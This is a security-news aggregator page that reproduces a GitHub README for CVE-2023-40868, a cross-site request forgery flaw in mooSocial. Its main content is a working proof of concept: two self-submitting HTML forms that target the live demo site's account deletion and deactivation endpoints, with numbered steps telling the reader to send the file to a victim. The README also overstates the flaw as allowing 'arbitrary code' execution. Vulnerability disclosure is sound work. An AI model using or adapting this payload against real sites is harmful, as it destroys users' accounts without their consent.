Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-40868: GitHub - MinoTauro2020/CVE-2023-40868: Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Dea

Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.

CVE
Open in Source
#csrf#vulnerability#web#git

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

1 branch 0 tags

Code

  • Use Git or checkout with SVN using the web URL.

  • Open with GitHub Desktop

  • Download ZIP

Latest commit

Files

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

# CVE-2023-40868

Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.

The vulnerability is a Cross-Site Request Forgery (CSRF) vulnerability in the mooSocial MooSocial Software v.Demo application. A CSRF vulnerability occurs when a malicious actor can trick a victim into performing an action that they did not intend to perform. In this case, the malicious actor could trick the victim into clicking on a link or opening a file that contains malicious code. This code could then be used to delete the victim’s account or deactivate their account.

POC

1 - Make an file with with this CODE and SAVE in HTML Attack Delete Account

<html> <body> <form action="https://socialcommerce.moosocial.com/users/delete_account"> <input type="submit" value="Submit request" /> </form> <script> history.pushState('’, '’, ‘/’); document.forms[0].submit(); </script> </body> </html>

OR Make an file with this CODE and SAVE in HTML Attack Deactivate Account

<html> <body> <form action="https://socialcommerce.moosocial.com/users/deactivate"> <input type="submit" value="Submit request" /> </form> <script> history.pushState('’, '’, ‘/’); document.forms[0].submit(); </script> </body> </html>

2 - Example test.html

3 - Send to the victim

4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click at the button the code will changes in his actually session.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE